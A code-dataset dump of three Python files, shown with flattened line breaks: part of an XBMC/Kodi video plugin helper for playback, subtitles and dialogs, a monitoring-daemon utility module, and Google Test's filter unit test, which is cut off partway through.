xbmcPlayer = xbmc.Player( player_type ) xbmcPlayer.play(playlist) while xbmcPlayer.isPlaying(): xbmc.sleep(5000) logger.info("sigo aquí...") logger.info("fin") ''' if config.get_setting("subtitulo") == "true" and view: logger.info("b11") from core import subtitletools wait2second() subtitletools.set_Subtitle() if subtitle!="": xbmc.Player().setSubtitles(subtitle) #FIXME: Qué cosa más fea... elif channel=="moviezet": xbmc.Player().setSubtitles(subtitle) def handle_wait(time_to_wait,title,text): logger.info ("[xbmctools.py] handle_wait(time_to_wait=%d)" % time_to_wait) import xbmc,xbmcgui espera = xbmcgui.DialogProgress() ret = espera.create(' '+title) secs=0 percent=0 increment = int(100 / time_to_wait) cancelled = False while secs < time_to_wait: secs = secs + 1 percent = increment*secs secs_left = str((time_to_wait - secs)) remaining_display = ' Espera '+secs_left+' segundos para que comience el vídeo...' espera.update(percent,' '+text,remaining_display) xbmc.sleep(1000) if (espera.iscanceled()): cancelled = True break if cancelled == True: logger.info ('Espera cancelada') return False else: logger.info ('Espera finalizada') return True def getLibraryInfo (mediaurl): '''Obtiene información de la Biblioteca si existe (ficheros strm) o de los parámetros ''' if DEBUG: logger.info('[xbmctools.py] playlist OBTENCIÓN DE DATOS DE BIBLIOTECA') # Información básica label = xbmc.getInfoLabel( 'listitem.label' ) label2 = xbmc.getInfoLabel( 'listitem.label2' ) iconImage = xbmc.getInfoImage( 'listitem.icon' ) thumbnailImage = xbmc.getInfoImage( 'listitem.Thumb' ) #xbmc.getInfoLabel( 'listitem.thumbnailImage' ) if DEBUG: logger.info ("[xbmctools.py]getMediaInfo: label = " + label) logger.info ("[xbmctools.py]getMediaInfo: label2 = " + label2) logger.info ("[xbmctools.py]getMediaInfo: iconImage = " + iconImage) logger.info ("[xbmctools.py]getMediaInfo: thumbnailImage = " + thumbnailImage) # Creación de listitem listitem = xbmcgui.ListItem(label, label2, iconImage, thumbnailImage, mediaurl) # Información adicional lista = [ ('listitem.genre', 's'), #(Comedy) ('listitem.year', 'i'), #(2009) ('listitem.episode', 'i'), #(4) ('listitem.season', 'i'), #(1) ('listitem.top250', 'i'), #(192) ('listitem.tracknumber', 'i'), #(3) ('listitem.rating', 'f'), #(6.4) - range is 0..10 # ('listitem.watched', 'd'), # depreciated. use playcount instead ('listitem.playcount', 'i'), #(2) - number of times this item has been played # ('listitem.overlay', 'i'), #(2) - range is 0..8. See GUIListItem.h for values ('listitem.overlay', 's'), #JUR - listitem devuelve un string, pero addinfo espera un int. Ver traducción más abajo ('listitem.cast', 's'), # (Michal C. Hall) - List concatenated into a string ('listitem.castandrole', 's'), #(Michael C. Hall|Dexter) - List concatenated into a string ('listitem.director', 's'), #(Dagur Kari) ('listitem.mpaa', 's'), #(PG-13) ('listitem.plot', 's'), #(Long Description) ('listitem.plotoutline', 's'), #(Short Description) ('listitem.title', 's'), #(Big Fan) ('listitem.duration', 's'), #(3) ('listitem.studio', 's'), #(Warner Bros.) ('listitem.tagline', 's'), #(An awesome movie) - short description of movie ('listitem.writer', 's'), #(Robert D. Siegel) ('listitem.tvshowtitle', 's'), #(Heroes) ('listitem.premiered', 's'), #(2005-03-04) ('listitem.status', 's'), #(Continuing) - status of a TVshow ('listitem.code', 's'), #(tt0110293) - IMDb code ('listitem.aired', 's'), #(2008-12-07) ('listitem.credits', 's'), #(Andy Kaufman) - writing credits ('listitem.lastplayed', 's'), #(%Y-%m-%d %h ('listitem.album', 's'), #(The Joshua Tree) ('listitem.votes', 's'), #(12345 votes) ('listitem.trailer', 's'), #(/home/user/trailer.avi) ] # Obtenemos toda la info disponible y la metemos en un diccionario # para la función setInfo. infodict = dict() for label,tipo in lista: key = label.split('.',1)[1] value = xbmc.getInfoLabel( label ) if value != "": if DEBUG: logger.info ("[xbmctools.py]getMediaInfo: "+key+" = " + value) #infoimage=infolabel if tipo == 's': infodict[key]=value elif tipo == 'i': infodict[key]=int(value) elif tipo == 'f': infodict[key]=float(value) #Transforma el valor de overlay de string a int. if infodict.has_key('overlay'): value = infodict['overlay'].lower() if value.find('rar') > -1: infodict['overlay'] = 1 elif value.find('zip')> -1: infodict['overlay'] = 2 elif value.find('trained')> -1: infodict['overlay'] = 3 elif value.find('hastrainer')> -1: infodict['overlay'] = 4 elif value.find('locked')> -1: infodict['overlay'] = 5 elif value.find('unwatched')> -1: infodict['overlay'] = 6 elif value.find('watched')> -1: infodict['overlay'] = 7 elif value.find('hd')> -1: infodict['overlay'] = 8 else: infodict.pop('overlay') if len (infodict) > 0: listitem.setInfo( "video", infodict ) return listitem def alertnodisponible(): advertencia = xbmcgui.Dialog() #'Vídeo no disponible' #'No se han podido localizar videos en la página del canal' resultado = advertencia.ok(config.get_localized_string(30055) , config.get_localized_string(30056)) def alertnodisponibleserver(server): advertencia = xbmcgui.Dialog() # 'El vídeo ya no está en %s' , 'Prueba en otro servidor o en otro canal' resultado = advertencia.ok( config.get_localized_string(30055),(config.get_localized_string(30057)%server),config.get_localized_string(30058)) def alertUnsopportedServer(): advertencia = xbmcgui.Dialog() # 'Servidor no soportado o desconocido' , 'Prueba en otro servidor o en otro canal' resultado = advertencia.ok( config.get_localized_string(30065),config.get_localized_string(30058)) def alerterrorpagina(): advertencia = xbmcgui.Dialog() #'Error en el sitio web' #'No se puede acceder por un error en el sitio web' resultado = advertencia.ok(config.get_localized_string(30059) , config.get_localized_string(30060)) def alertanomegauploadlow(server): advertencia = xbmcgui.Dialog() #'La calidad elegida no esta disponible', 'o el video ha sido borrado', #'Prueba a reproducir en otra calidad' resultado = advertencia.ok( config.get_localized_string(30055) , config.get_localized_string(30061) , config.get_localized_string(30062)) # AÑADIDO POR JUR. SOPORTE DE FICHEROS STRM def playstrm(params,url,category): '''Play para videos en ficheros strm ''' logger.info("[xbmctools.py] playstrm url="+url) title = unicode( xbmc.getInfoLabel( "ListItem.Title" ), "utf-8" ) thumbnail = urllib.unquote_plus( params.get("thumbnail") ) plot = unicode( xbmc.getInfoLabel( "ListItem.Plot" ), "utf-8" ) server = params["server"] if (params.has_key("Serie")): serie = params.get("Serie") else: serie = "" if (params.has_key("subtitle")): subtitle = params.get("subtitle") else: subtitle = "" from core.item import Item from core.subtitletools import saveSubtitleName item = Item(title=title,show=serie) saveSubtitleName(item) play_video("Biblioteca pelisalacarta",server,url,category,title,thumbnail,plot,strmfile=True,Serie=serie,subtitle=subtitle) def renderItems(itemlist, params, url, category, isPlayable='false'): viewmode = "list" if itemlist <> None: for item in itemlist: #logger.info("viewmode="+item.viewmode) if item.category == "": item.category = category if item.fulltitle=="": item.fulltitle=item.title if item.fanart=="": channel_fanart = os.path.join( config.get_runtime_path(), 'resources', 'images', 'fanart', item.channel+'.jpg') if os.path.exists(channel_fanart): item.fanart = channel_fanart else: item.fanart = os.path.join(config.get_runtime_path(),"fanart.jpg") if item.folder : if len(item.extra)>0: addnewfolderextra( item.channel , item.action , item.category , item.title , item.url , item.thumbnail , item.plot , extradata = item.extra , totalItems = len(itemlist), fanart=item.fanart , context=item.context, show=item.show, fulltitle=item.fulltitle ) else: addnewfolder( item.channel , item.action , item.category , item.title , item.url , item.thumbnail , item.plot , totalItems = len(itemlist) , fanart = item.fanart, context = item.context, show=item.show, fulltitle=item.fulltitle ) else: if config.get_setting("player_mode")=="1": # SetResolvedUrl debe ser siempre "isPlayable = true" isPlayable = "true" if item.duration: addnewvideo( item.channel , item.action , item.category , item.server, item.title , item.url , item.thumbnail , item.plot , "" , duration = item.duration , fanart = item.fanart, IsPlayable=isPlayable,context = item.context , subtitle=item.subtitle, totalItems = len(itemlist), show=item.show, password = item.password, extra = item.extra, fulltitle=item.fulltitle ) else: addnewvideo( item.channel , item.action , item.category , item.server, item.title , item.url , item.thumbnail , item.plot, fanart = item.fanart, IsPlayable=isPlayable , context = item.context , subtitle = item.subtitle , totalItems = len(itemlist), show=item.show , password = item.password , extra=item.extra, fulltitle=item.fulltitle ) if item.viewmode!="list": viewmode = item.viewmode # Cierra el directorio xbmcplugin.setContent(pluginhandle,"Movies") xbmcplugin.setPluginCategory( handle=pluginhandle, category=category ) xbmcplugin.addSortMethod( handle=pluginhandle, sortMethod=xbmcplugin.SORT_METHOD_NONE ) # Modos biblioteca # MediaInfo3 - 503 # # Modos fichero # WideIconView - 505 # ThumbnailView - 500 if config.get_setting("forceview")=="true": if viewmode=="list": xbmc.executebuiltin("Container.SetViewMode(50)") elif viewmode=="movie_with_plot": xbmc.executebuiltin("Container.SetViewMode(503)") elif viewmode=="movie": xbmc.executebuiltin("Container.SetViewMode(500)") xbmcplugin.endOfDirectory( handle=pluginhandle, succeeded=True ) def wait2second(): logger.info("[xbmctools.py] wait2second") import time contador = 0 while xbmc.Player().isPlayingVideo()==False: logger.info("[xbmctools.py] setSubtitles: Waiting 2 seconds for video to start before setting subtitles") time.sleep(2) contador = contador + 1 if contador>10: break def setSubtitles(): logger.info("[xbmctools.py] setSubtitles") import time contador = 0 while xbmc.Player().isPlayingVideo()==False: logger.info("[xbmctools.py] setSubtitles: Waiting 2 seconds for video to start before setting subtitles") time.sleep(2) contador = contador + 1 if contador>10: break subtitlefile = os.path.join( config.get_data_path(), 'subtitulo.srt' ) logger.info("[xbmctools.py] setting subtitle file %s" % subtitlefile) xbmc.Player().setSubtitles(subtitlefile) def trailer(item): logger.info("[xbmctools.py] trailer") config.set_setting("subtitulo", "false") import sys xbmc.executebuiltin("XBMC.RunPlugin(%s?channel=%s&action=%s&category=%s&title=%s&url=%s&thumbnail=%s&plot=%s&server=%s)" % ( sys.argv[ 0 ] , "trailertools" , "buscartrailer" , urllib.quote_plus( item.category ) , urllib.quote_plus( item.fulltitle ) , urllib.quote_plus( item.url ) , urllib.quote_plus( item.thumbnail ) , urllib.quote_plus( "" ) )) return def alert_no_puedes_ver_video(server,url,motivo): import xbmcgui if server!="": advertencia = xbmcgui.Dialog() if "<br/>" in motivo: resultado = advertencia.ok( "No puedes ver ese vídeo porque...",motivo.split("<br/>")[0],motivo.split("<br/>")[1],url) else: resultado = advertencia.ok( "No puedes ver ese vídeo porque...",motivo,url) else: resultado = advertencia.ok( "No puedes ver ese vídeo porque...","El servidor donde está alojado no está","soportado en pelisalacarta todavía",url)
gpl-3.0
JonatanEnes/metrics-to-time-series
src/daemons/daemon_utils.py
1
7841
#!/usr/bin/env python from __future__ import print_function import abc import traceback from threading import Thread import os import time import configparser import errno import subprocess import sys import logging import requests _base_path = os.path.dirname(os.path.abspath(__file__)) def eprint(*args, **kwargs): print(*args, file=sys.stderr, **kwargs) class MonitoringDaemon: __metaclass__ = abc.ABCMeta def __init__(self, service_name, logger): self.SERVICE_NAME = service_name self.logger = logger self.stdin_path = '/dev/null' self.stdout_path = os.path.join(_base_path, "logs/" + self.SERVICE_NAME + ".out") self.stderr_path = os.path.join(_base_path, "logs/" + self.SERVICE_NAME + ".err") self.pidfile_path = os.path.join(_base_path, "pids/" + self.SERVICE_NAME + ".pid") self.pidfile_timeout = 5 self.pipeline_tries = 0 self.MAX_TRIES = 5 self.processes_list = [] self.dumper_thread = None self.environment = dict() self.is_runnable = None self.not_runnable_message = None def reload_pipeline(self, _signo, _stack_frame): self.logger.info("Going to reload pipeline") self.destroy_pipeline() self.processes_list = list() self.launch_pipeline() def launch_pipeline(self): self.logger.info("Launching pipeline") self.processes_list += self.create_pipeline() # Launch thread to log last process output (send to opentsdb of pipeline) thread = Thread(target=self.threaded_read_last_process_output, args=(self.processes_list[-1],)) thread.start() self.dumper_thread = thread def beat(self): from StateDatabase import couchDB as couchDB from MyUtils import MyUtils as MyUtils self.logger.info("Starting heartbeat of " + self.SERVICE_NAME) db_handler = couchDB.CouchDBServer() while True: try: MyUtils.beat(db_handler, self.SERVICE_NAME) time.sleep(10) except ValueError: # Service not found: # - maybe it doesn't exist at all, register it # - it may have been deleted while the daemon was running, re-register it register_service(db_handler, self.SERVICE_NAME) except requests.ConnectionError: # Error connecting to the Couchdb database, ignore as it may be temporary pass def launch_heartbeat(self): # Launch the heartbeat thread if "HEARTBEAT_ENABLED" in self.environment and self.environment["HEARTBEAT_ENABLED"] == "true": # Launch heartbeat thread heartbeat = Thread(target=self.beat, args=()) heartbeat.daemon = True heartbeat.start() def initialize_environment(self, config_path, config_keys, default_environment_values): self.environment = self.create_environment(read_config(config_path, config_keys), config_keys, default_environment_values) @staticmethod def threaded_read_last_process_output(process): for line in process.stdout: print(line.strip()) # Dump to stdout of daemon sys.stdout.flush() @staticmethod def create_environment(config_dict, config_keys, default_environment_values): custom_environment = os.environ.copy() # FROM CONFIG FILE # for key in config_keys: if key in config_dict.keys(): custom_environment[key] = config_dict[key] else: custom_environment[key] = default_environment_values[key] return custom_environment @staticmethod def good_finish(): sys.exit(0) @staticmethod def bad_finish(): sys.exit(1) @staticmethod def create_pipe(cmd, environment, pipe_input, pipe_output): return subprocess.Popen(cmd, env=environment, stdin=pipe_input, stdout=pipe_output ) # Terminate all the programs that create the pipeline def destroy_pipeline(self): self.logger.info("Destroying pipeline") for process in self.processes_list: try: process.terminate() process.wait() self.logger.info( "Process " + str(process.pid) + " terminated with exit status " + str(process.returncode)) except OSError: # Process may have already exited pass def poll_for_exited_processes(self): for process in self.processes_list: process.poll() if process.returncode is not None: return True return False def check_if_runnable(self): if not self.is_runnable(self.environment): eprint(self.not_runnable_message) def loop(self): try: while True: exited_processes = self.poll_for_exited_processes() if exited_processes: self.logger.info("Error in pipeline") self.destroy_pipeline() if self.pipeline_tries < self.MAX_TRIES: self.pipeline_tries += 1 self.logger.info("The pipeline was destroyed, re-creating and launching a new one") self.launch_pipeline() else: self.logger.info( "Pipeline failed too many times, (" + str(self.MAX_TRIES) + "), stopping daemon") self.bad_finish() time.sleep(5) except(SystemExit, KeyboardInterrupt): self.logger.info("Exception or signal caught, stopping daemon and destroying the pipeline.") self.destroy_pipeline() self.good_finish() @abc.abstractmethod def create_pipeline(self): """Method documentation""" return [] def command_is_runnable(command_as_list): try: subprocess.check_call(command_as_list, stdout=subprocess.PIPE, stderr=subprocess.PIPE) except Exception as e: eprint(str(e) + " " + str(traceback.format_exc())) return False return True def read_config(config_path, config_keys): config_dict = {} config = configparser.ConfigParser() config.read(os.path.join(_base_path, config_path)) for key in config_keys: try: config_dict[key] = config['DEFAULT'][key] except KeyError: pass # Key is not configure, take the default value return config_dict def check_path_existance_and_create(path): try: os.makedirs(path) except OSError as exception: if exception.errno != errno.EEXIST: raise def register_service(db_handler, service_name): import MyUtils.MyUtils as MyUtils service = dict( name=service_name, heartbeat="", heartbeat_human="", type="service" ) MyUtils.register_service(db_handler, service) def configure_daemon_logs(service_name): logger = logging.getLogger(service_name) logger.setLevel(logging.INFO) formatter = logging.Formatter("%(asctime)s - %(name)s - %(message)s") log_path = os.path.join(_base_path, "logs/") check_path_existance_and_create(log_path) pids_path = os.path.join(_base_path, "pids/") check_path_existance_and_create(pids_path) handler = logging.FileHandler(os.path.join(log_path, service_name + ".log")) handler.setFormatter(formatter) logger.addHandler(handler) return handler, logger
gpl-3.0
toanalien/phantomjs
src/qt/qtwebkit/Source/ThirdParty/gtest/test/gtest_filter_unittest.py
2826
21261
#!/usr/bin/env python # # Copyright 2005 Google Inc. All Rights Reserved. # # Redistribution and use in source and binary forms, with or without # modification, are permitted provided that the following conditions are # met: # # * Redistributions of source code must retain the above copyright # notice, this list of conditions and the following disclaimer. # * Redistributions in binary form must reproduce the above # copyright notice, this list of conditions and the following disclaimer # in the documentation and/or other materials provided with the # distribution. # * Neither the name of Google Inc. nor the names of its # contributors may be used to endorse or promote products derived from # this software without specific prior written permission. # # THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS # "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT # LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR # A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT # OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, # SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT # LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, # DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY # THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT # (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE # OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE. """Unit test for Google Test test filters. A user can specify which test(s) in a Google Test program to run via either the GTEST_FILTER environment variable or the --gtest_filter flag. This script tests such functionality by invoking gtest_filter_unittest_ (a program written with Google Test) with different environments and command line flags. Note that test sharding may also influence which tests are filtered. Therefore, we test that here also. """ __author__ = 'wan@google.com (Zhanyong Wan)' import os import re import sets import sys import gtest_test_utils # Constants. # Checks if this platform can pass empty environment variables to child # processes. We set an env variable to an empty string and invoke a python # script in a subprocess to print whether the variable is STILL in # os.environ. We then use 'eval' to parse the child's output so that an # exception is thrown if the input is anything other than 'True' nor 'False'. os.environ['EMPTY_VAR'] = '' child = gtest_test_utils.Subprocess( [sys.executable, '-c', 'import os; print \'EMPTY_VAR\' in os.environ']) CAN_PASS_EMPTY_ENV = eval(child.output) # Check if this platform can unset environment variables in child processes. # We set an env variable to a non-empty string, unset it, and invoke # a python script in a subprocess to print whether the variable # is NO LONGER in os.environ. # We use 'eval' to parse the child's output so that an exception # is thrown if the input is neither 'True' nor 'False'. os.environ['UNSET_VAR'] = 'X' del os.environ['UNSET_VAR'] child = gtest_test_utils.Subprocess( [sys.executable, '-c', 'import os; print \'UNSET_VAR\' not in os.environ']) CAN_UNSET_ENV = eval(child.output) # Checks if we should test with an empty filter. This doesn't # make sense on platforms that cannot pass empty env variables (Win32) # and on platforms that cannot unset variables (since we cannot tell # the difference between "" and NULL -- Borland and Solaris < 5.10) CAN_TEST_EMPTY_FILTER = (CAN_PASS_EMPTY_ENV and CAN_UNSET_ENV) # The environment variable for specifying the test filters. FILTER_ENV_VAR = 'GTEST_FILTER' # The environment variables for test sharding. TOTAL_SHARDS_ENV_VAR = 'GTEST_TOTAL_SHARDS' SHARD_INDEX_ENV_VAR = 'GTEST_SHARD_INDEX' SHARD_STATUS_FILE_ENV_VAR = 'GTEST_SHARD_STATUS_FILE' # The command line flag for specifying the test filters. FILTER_FLAG = 'gtest_filter' # The command line flag for including disabled tests. ALSO_RUN_DISABED_TESTS_FLAG = 'gtest_also_run_disabled_tests' # Command to run the gtest_filter_unittest_ program. COMMAND = gtest_test_utils.GetTestExecutablePath('gtest_filter_unittest_') # Regex for determining whether parameterized tests are enabled in the binary. PARAM_TEST_REGEX = re.compile(r'/ParamTest') # Regex for parsing test case names from Google Test's output. TEST_CASE_REGEX = re.compile(r'^\[\-+\] \d+ tests? from (\w+(/\w+)?)') # Regex for parsing test names from Google Test's output. TEST_REGEX = re.compile(r'^\[\s*RUN\s*\].*\.(\w+(/\w+)?)') # The command line flag to tell Google Test to output the list of tests it # will run. LIST_TESTS_FLAG = '--gtest_list_tests' # Indicates whether Google Test supports death tests. SUPPORTS_DEATH_TESTS = 'HasDeathTest' in gtest_test_utils.Subprocess( [COMMAND, LIST_TESTS_FLAG]).output # Full names of all tests in gtest_filter_unittests_. PARAM_TESTS = [ 'SeqP/ParamTest.TestX/0', 'SeqP/ParamTest.TestX/1', 'SeqP/ParamTest.TestY/0', 'SeqP/ParamTest.TestY/1', 'SeqQ/ParamTest.TestX/0', 'SeqQ/ParamTest.TestX/1', 'SeqQ/ParamTest.TestY/0', 'SeqQ/ParamTest.TestY/1', ] DISABLED_TESTS = [ 'BarTest.DISABLED_TestFour', 'BarTest.DISABLED_TestFive', 'BazTest.DISABLED_TestC', 'DISABLED_FoobarTest.Test1', 'DISABLED_FoobarTest.DISABLED_Test2', 'DISABLED_FoobarbazTest.TestA', ] if SUPPORTS_DEATH_TESTS: DEATH_TESTS = [ 'HasDeathTest.Test1', 'HasDeathTest.Test2', ] else: DEATH_TESTS = [] # All the non-disabled tests. ACTIVE_TESTS = [ 'FooTest.Abc', 'FooTest.Xyz', 'BarTest.TestOne', 'BarTest.TestTwo', 'BarTest.TestThree', 'BazTest.TestOne', 'BazTest.TestA', 'BazTest.TestB', ] + DEATH_TESTS + PARAM_TESTS param_tests_present = None # Utilities. environ = os.environ.copy() def SetEnvVar(env_var, value): """Sets the env variable to 'value'; unsets it when 'value' is None.""" if value is not None: environ[env_var] = value elif env_var in environ: del environ[env_var] def RunAndReturnOutput(args = None): """Runs the test program and returns its output.""" return gtest_test_utils.Subprocess([COMMAND] + (args or []), env=environ).output def RunAndExtractTestList(args = None): """Runs the test program and returns its exit code and a list of tests run.""" p = gtest_test_utils.Subprocess([COMMAND] + (args or []), env=environ) tests_run = [] test_case = '' test = '' for line in p.output.split('\n'): match = TEST_CASE_REGEX.match(line) if match is not None: test_case = match.group(1) else: match = TEST_REGEX.match(line) if match is not None: test = match.group(1) tests_run.append(test_case + '.' + test) return (tests_run, p.exit_code) def InvokeWithModifiedEnv(extra_env, function, *args, **kwargs): """Runs the given function and arguments in a modified environment.""" try: original_env = environ.copy() environ.update(extra_env) return function(*args, **kwargs) finally: environ.clear() environ.update(original_env) def RunWithSharding(total_shards, shard_index, command): """Runs a test program shard and returns exit code and a list of tests run.""" extra_env = {SHARD_INDEX_ENV_VAR: str(shard_index), TOTAL_SHARDS_ENV_VAR: str(total_shards)} return InvokeWithModifiedEnv(extra_env, RunAndExtractTestList, command) # The unit test. class GTestFilterUnitTest(gtest_test_utils.TestCase): """Tests the env variable or the command line flag to filter tests.""" # Utilities. def AssertSetEqual(self, lhs, rhs): """Asserts that two sets are equal.""" for elem in lhs: self.assert_(elem in rhs, '%s in %s' % (elem, rhs)) for elem in rhs: self.assert_(elem in lhs, '%s in %s' % (elem, lhs)) def AssertPartitionIsValid(self, set_var, list_of_sets): """Asserts that list_of_sets is a valid partition of set_var.""" full_partition = [] for slice_var in list_of_sets: full_partition.extend(slice_var) self.assertEqual(len(set_var), len(full_partition)) self.assertEqual(sets.Set(set_var), sets.Set(full_partition)) def AdjustForParameterizedTests(self, tests_to_run): """Adjust tests_to_run in case value parameterized tests are disabled.""" global param_tests_present if not param_tests_present: return list(sets.Set(tests_to_run) - sets.Set(PARAM_TESTS)) else: return tests_to_run def RunAndVerify(self, gtest_filter, tests_to_run): """Checks that the binary runs correct set of tests for a given filter.""" tests_to_run = self.AdjustForParameterizedTests(tests_to_run) # First, tests using the environment variable. # Windows removes empty variables from the environment when passing it # to a new process. This means it is impossible to pass an empty filter # into a process using the environment variable. However, we can still # test the case when the variable is not supplied (i.e., gtest_filter is # None). # pylint: disable-msg=C6403 if CAN_TEST_EMPTY_FILTER or gtest_filter != '': SetEnvVar(FILTER_ENV_VAR, gtest_filter) tests_run = RunAndExtractTestList()[0] SetEnvVar(FILTER_ENV_VAR, None) self.AssertSetEqual(tests_run, tests_to_run) # pylint: enable-msg=C6403 # Next, tests using the command line flag. if gtest_filter is None: args = [] else: args = ['--%s=%s' % (FILTER_FLAG, gtest_filter)] tests_run = RunAndExtractTestList(args)[0] self.AssertSetEqual(tests_run, tests_to_run) def RunAndVerifyWithSharding(self, gtest_filter, total_shards, tests_to_run, args=None, check_exit_0=False): """Checks that binary runs correct tests for the given filter and shard. Runs all shards of gtest_filter_unittest_ with the given filter, and verifies that the right set of tests were run. The union of tests run on each shard should be identical to tests_to_run, without duplicates. Args: gtest_filter: A filter to apply to the tests. total_shards: A total number of shards to split test run into. tests_to_run: A set of tests expected to run. args : Arguments to pass to the to the test binary. check_exit_0: When set to a true value, make sure that all shards return 0. """ tests_to_run = self.AdjustForParameterizedTests(tests_to_run) # Windows removes empty variables from the environment when passing it # to a new process. This means it is impossible to pass an empty filter # into a process using the environment variable. However, we can still # test the case when the variable is not supplied (i.e., gtest_filter is # None). # pylint: disable-msg=C6403 if CAN_TEST_EMPTY_FILTER or gtest_filter != '': SetEnvVar(FILTER_ENV_VAR, gtest_filter) partition = [] for i in range(0, total_shards): (tests_run, exit_code) = RunWithSharding(total_shards, i, args) if check_exit_0: self.assertEqual(0, exit_code) partition.append(tests_run) self.AssertPartitionIsValid(tests_to_run, partition) SetEnvVar(FILTER_ENV_VAR, None) # pylint: enable-msg=C6403 def RunAndVerifyAllowingDisabled(self, gtest_filter, tests_to_run): """Checks that the binary runs correct set of tests for the given filter. Runs gtest_filter_unittest_ with the given filter, and enables disabled tests. Verifies that the right set of tests were run. Args: gtest_filter: A filter to apply to the tests. tests_to_run: A set of tests expected to run. """ tests_to_run = self.AdjustForParameterizedTests(tests_to_run) # Construct the command line. args = ['--%s' % ALSO_RUN_DISABED_TESTS_FLAG] if gtest_filter is not None: args.append('--%s=%s' % (FILTER_FLAG, gtest_filter)) tests_run = RunAndExtractTestList(args)[0] self.AssertSetEqual(tests_run, tests_to_run) def setUp(self): """Sets up test case. Determines whether value-parameterized tests are enabled in the binary and sets the flags accordingly. """ global param_tests_present if param_tests_present is None: param_tests_present = PARAM_TEST_REGEX.search( RunAndReturnOutput()) is not None def testDefaultBehavior(self): """Tests the behavior of not specifying the filter.""" self.RunAndVerify(None, ACTIVE_TESTS) def testDefaultBehaviorWithShards(self): """Tests the behavior without the filter, with sharding enabled.""" self.RunAndVerifyWithSharding(None, 1, ACTIVE_TESTS) self.RunAndVerifyWithSharding(None, 2, ACTIVE_TESTS) self.RunAndVerifyWithSharding(None, len(ACTIVE_TESTS) - 1, ACTIVE_TESTS) self.RunAndVerifyWithSharding(None, len(ACTIVE_TESTS), ACTIVE_TESTS) self.RunAndVerifyWithSharding(None, len(ACTIVE_TESTS) + 1, ACTIVE_TESTS) def testEmptyFilter(self): """Tests an empty filter.""" self.RunAndVerify('', []) self.RunAndVerifyWithSharding('', 1, []) self.RunAndVerifyWithSharding('', 2, []) def testBadFilter(self): """Tests a filter that matches nothing.""" self.RunAndVerify('BadFilter', []) self.RunAndVerifyAllowingDisabled('BadFilter', []) def testFullName(self): """Tests filtering by full name.""" self.RunAndVerify('FooTest.Xyz', ['FooTest.Xyz']) self.RunAndVerifyAllowingDisabled('FooTest.Xyz', ['FooTest.Xyz']) self.RunAndVerifyWithSharding('FooTest.Xyz', 5, ['FooTest.Xyz']) def testUniversalFilters(self): """Tests filters that match everything.""" self.RunAndVerify('*', ACTIVE_TESTS) self.RunAndVerify('*.*', ACTIVE_TESTS) self.RunAndVerifyWithSharding('*.*', len(ACTIVE_TESTS) - 3, ACTIVE_TESTS) self.RunAndVerifyAllowingDisabled('*', ACTIVE_TESTS + DISABLED_TESTS) self.RunAndVerifyAllowingDisabled('*.*', ACTIVE_TESTS + DISABLED_TESTS) def testFilterByTestCase(self): """Tests filtering by test case name.""" self.RunAndVerify('FooTest.*', ['FooTest.Abc', 'FooTest.Xyz']) BAZ_TESTS = ['BazTest.TestOne', 'BazTest.TestA', 'BazTest.TestB'] self.RunAndVerify('BazTest.*', BAZ_TESTS) self.RunAndVerifyAllowingDisabled('BazTest.*', BAZ_TESTS + ['BazTest.DISABLED_TestC']) def testFilterByTest(self): """Tests filtering by test name.""" self.RunAndVerify('*.TestOne', ['BarTest.TestOne', 'BazTest.TestOne']) def testFilterDisabledTests(self): """Select only the disabled tests to run.""" self.RunAndVerify('DISABLED_FoobarTest.Test1', []) self.RunAndVerifyAllowingDisabled('DISABLED_FoobarTest.Test1', ['DISABLED_FoobarTest.Test1']) self.RunAndVerify('*DISABLED_*', []) self.RunAndVerifyAllowingDisabled('*DISABLED_*', DISABLED_TESTS) self.RunAndVerify('*.DISABLED_*', []) self.RunAndVerifyAllowingDisabled('*.DISABLED_*', [ 'BarTest.DISABLED_TestFour', 'BarTest.DISABLED_TestFive', 'BazTest.DISABLED_TestC', 'DISABLED_FoobarTest.DISABLED_Test2', ]) self.RunAndVerify('DISABLED_*', []) self.RunAndVerifyAllowingDisabled('DISABLED_*', [ 'DISABLED_FoobarTest.Test1', 'DISABLED_FoobarTest.DISABLED_Test2', 'DISABLED_FoobarbazTest.TestA', ]) def testWildcardInTestCaseName(self): """Tests using wildcard in the test case name.""" self.RunAndVerify('*a*.*', [ 'BarTest.TestOne', 'BarTest.TestTwo', 'BarTest.TestThree', 'BazTest.TestOne', 'BazTest.TestA', 'BazTest.TestB', ] + DEATH_TESTS + PARAM_TESTS) def testWildcardInTestName(self): """Tests using wildcard in the test name.""" self.RunAndVerify('*.*A*', ['FooTest.Abc', 'BazTest.TestA']) def testFilterWithoutDot(self): """Tests a filter that has no '.' in it.""" self.RunAndVerify('*z*', [ 'FooTest.Xyz', 'BazTest.TestOne', 'BazTest.TestA', 'BazTest.TestB', ]) def testTwoPatterns(self): """Tests filters that consist of two patterns.""" self.RunAndVerify('Foo*.*:*A*', [ 'FooTest.Abc', 'FooTest.Xyz', 'BazTest.TestA', ]) # An empty pattern + a non-empty one self.RunAndVerify(':*A*', ['FooTest.Abc', 'BazTest.TestA']) def testThreePatterns(self): """Tests filters that consist of three patterns.""" self.RunAndVerify('*oo*:*A*:*One', [ 'FooTest.Abc', 'FooTest.Xyz', 'BarTest.TestOne', 'BazTest.TestOne', 'BazTest.TestA', ]) # The 2nd pattern is empty. self.RunAndVerify('*oo*::*One', [ 'FooTest.Abc', 'FooTest.Xyz', 'BarTest.TestOne', 'BazTest.TestOne', ]) # The last 2 patterns are empty. self.RunAndVerify('*oo*::', [ 'FooTest.Abc', 'FooTest.Xyz', ]) def testNegativeFilters(self): self.RunAndVerify('*-BazTest.TestOne', [ 'FooTest.Abc', 'FooTest.Xyz', 'BarTest.TestOne', 